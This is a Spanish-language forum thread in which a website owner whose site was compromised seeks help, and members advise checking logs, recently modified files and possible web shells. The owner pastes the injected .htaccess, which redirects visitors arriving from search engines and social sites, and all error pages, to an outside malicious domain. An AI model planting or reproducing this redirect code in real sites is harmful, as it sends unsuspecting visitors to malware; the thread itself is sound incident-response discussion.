Me están atacando y no se ni como ni por donde

Iniciado por Zedmix, 17 Mayo 2012, 12:13 PM

0 Miembros y 1 Visitante están viendo este tema.

Zedmix

Muy buenas, actualmente estoy recibiendo un ataque en mi sitio web, este sitio web proporciona pequeñas páginas webs a pequeñas empresas y autónomos, esta mañana cuando han intentado acceder al sitio web nos hemos encontrado con que no carga la portada, el título de la página no se muestra y en el lugar donde debe de estar todo el contenido nos muestra lo siguiente ubbylys.ru/count28.php al introducir esta url en el navegador accede al sitio web http://178.162.157.189/70470006.html dando un eror 404 Not Found cosa que no comprendo. ¿alguna idea? ya no es una solución sino también el como lo han podido hacer, gracias un saludo.
Conciencia, Compromiso, Rebeldia y Solidaridad



it3r

mm podrías revisar los logs del apache comúnmente en /var/logs/httpd mira si encuentras algo sospechoso como intentos de sql injection o alguna cosa, luego revisa si es que existe algún nuevo usuario creado en el sistema, revisa su historial de comandos (.bash_history), quizás haya sido un ataque automatizado, osea algún bot que se encargue de escanear y automáticamente inyectar malware en las paginas.

de todos modos no olvides que si usas algún CMS o parecido, debes mantenerlo actualizado.

Saludos

el-brujo

si os han cambiado la página no es un ataque, es un hackeo xD

Mi consejo es que restaures una copia de seguridad e investigues cómo han podido acceder, tal y como te comentan, mirando los logs y demás.

Aquí tienes un ejemplo de por dónde empezar:
http://foro.elhacker.net/seguridad/hackearon_la_empresa_confirmado-t358070.0.html;msg1738306#msg1738306

$Edu$

Fijate tambien si no te han instalado una shell para poder entrar las veces que quieran luego.

Zedmix

Buenas, estoy con el log y he encontrado lo siguiente lo cual no estoy seguro si es algo que repercuta sobre este problema, debido a que lo que muestra el sitio web es ubbylys.ru/count28.php he buscado en el log una extensión rusa y he encontrado lo siguiente en el log.

sticker01.yandex.ru - - [17/May/2012:11:26:49 +0200] "GET /robots.txt HTTP/1.1" 403 22 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
sticker01.yandex.ru - - [17/May/2012:11:26:50 +0200] "GET / HTTP/1.1" 403 42 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
sticker01.yandex.ru - - [17/May/2012:11:26:51 +0200] "GET / HTTP/1.1" 403 42 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
ticker01.yandex.ru - - [17/May/2012:14:03:34 +0200] "GET /robots.txt HTTP/1.1" 403 22 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
sticker01.yandex.ru - - [17/May/2012:14:03:35 +0200] "GET /una_web HTTP/1.1" 403 42 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
sticker01.yandex.ru - - [17/May/2012:14:03:36 +0200] "GET /una_web HTTP/1.1" 403 42 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
Conciencia, Compromiso, Rebeldia y Solidaridad



it3r

Cita de: Zedmix en 18 Mayo 2012, 09:48 AM
Buenas, estoy con el log y he encontrado lo siguiente lo cual no estoy seguro si es algo que repercuta sobre este problema, debido a que lo que muestra el sitio web es ubbylys.ru/count28.php he buscado en el log una extensión rusa y he encontrado lo siguiente en el log.

sticker01.yandex.ru - - [17/May/2012:11:26:49 +0200] "GET /robots.txt HTTP/1.1" 403 22 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
sticker01.yandex.ru - - [17/May/2012:11:26:50 +0200] "GET / HTTP/1.1" 403 42 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
sticker01.yandex.ru - - [17/May/2012:11:26:51 +0200] "GET / HTTP/1.1" 403 42 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
ticker01.yandex.ru - - [17/May/2012:14:03:34 +0200] "GET /robots.txt HTTP/1.1" 403 22 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
sticker01.yandex.ru - - [17/May/2012:14:03:35 +0200] "GET /una_web HTTP/1.1" 403 42 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
sticker01.yandex.ru - - [17/May/2012:14:03:36 +0200] "GET /una_web HTTP/1.1" 403 42 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"


Yandex.ru es el buscador mas conocido de rusia según he escuchado, esos logs solo muestran al BOT de yandex.ru indexando tu web.

No se si ya modificaste tu archivo php, si no, podrías ver la ultima fecha de modificación y revisar en el log mas o menos antes de la ultima fecha de modificación.También podrías ver los logs desde la ultima vez que estaba bien tu web.

Puedes ayudarte de los comandos tail y grep un ejemplo:

Las ultimas 1000 lineas del acces_log-01 y que muestre solo las lineas que contengan AND

tail -1000 /var/log/httpd/access_log-01 | grep AND


El and es un patrón común en las sql injections, tambien podrias buscar patrones sobre RFI.

Saludos

Zedmix

Muy buenas continuo aquí investigando, como ha dicho el compañero @it3r he comprobado los últimos archivos con modificaciones, y me he encontrado con tres archivos que se han modificado recientemente, que son: index.php, asdf.html y .htaccess ambos están modificados a la misma hora y el mismo día los abriré y os comento en breve.

Gracias
Conciencia, Compromiso, Rebeldia y Solidaridad



Zedmix

Buenas, después de revisar los archivos:

  • asdf.html: es un archivo en jQueryMobile con el cual yo hice prueba hace bastante tiempo y no lo eliminé ahora veo que ha sido moificado a la misma hora y día que cuando comenzó esto y no me permite eliminarlo
  • index.php: no veo ninguna anomalía, pero también ha sido modificado el archivo a la hora y día del acceso
  • .htaccess: aquí viene el asunto, he modificado el nombre de este archivo y parece que se ha solucionado el problema, pero cuando accedo al servidor desde un explorador, es decir abro una web, en la zona inferior izquierda del Chrome me muestra, "esperando a ubbylys.ru" ¿?¿?¿?

También mostraros el contenido del archivo .htaccess


#d93065#
RewriteEngine On
ErrorDocument 400 ubbylys.ru/count28.php
ErrorDocument 401 ubbylys.ru/count28.php
ErrorDocument 403 ubbylys.ru/count28.php
ErrorDocument 404 ubbylys.ru/count28.php
ErrorDocument 500 ubbylys.ru/count28.php
ErrorDocument 502 ubbylys.ru/count28.php
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*baidu.* [OR]
RewriteCond %{HTTP_REFERER} .*youtube.* [OR]
RewriteCond %{HTTP_REFERER} .*wikipedia.* [OR]
RewriteCond %{HTTP_REFERER} .*qq.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.* [OR]
RewriteCond %{HTTP_REFERER} .*facebook.* [OR]
RewriteCond %{HTTP_REFERER} .*twitter.* [OR]
RewriteCond %{HTTP_REFERER} .*blog.* [OR]
RewriteCond %{HTTP_REFERER} .*live.* [OR]
RewriteCond %{HTTP_REFERER} .*myspace.* [OR]
RewriteCond %{HTTP_REFERER} .*linkedin.* [OR]
RewriteCond %{HTTP_REFERER} .*flickr.*
RewriteRule ^(.*)$ ubbylys.ru/count28.php [R=301,L]
#/d93065#
Conciencia, Compromiso, Rebeldia y Solidaridad



it3r

no se si estas en un hosting o un server que tu mismo administras pero como te comentaron antes, debes restaurar con una copia de seguridad que tengas, si no la tienes (muy mal hecho xD) y estas en un hosting pregunta si ellos tienen una copia de seguridad de tu web y si estas en un servidor controlado por ti, entonces lee el link que te pasaron antes.

Saludos

h3ct0r

El .htaccess es solo una cara de la moneda, revisa BIEN tus archivos php, puede que hagas include a algun script que no hallas revisado con detalle y tiene alguna referencia a ubbylys.ru. Lo mas probable es que sea algun pedazo de código ofuscado que muestre un javascript maligno así que dales una buena ojeada.

Si no encuentras nada raro en las fuentes, usa tamper data o live http headers para firefox y ve como se hacen los request desde tu pagina, capaz te ayude a ver donde están localizados los script maliciosos.

Offtopic : Últimamente están de moda los crackers rusos y chinos defaceando por ahí :silbar:
[img[/img]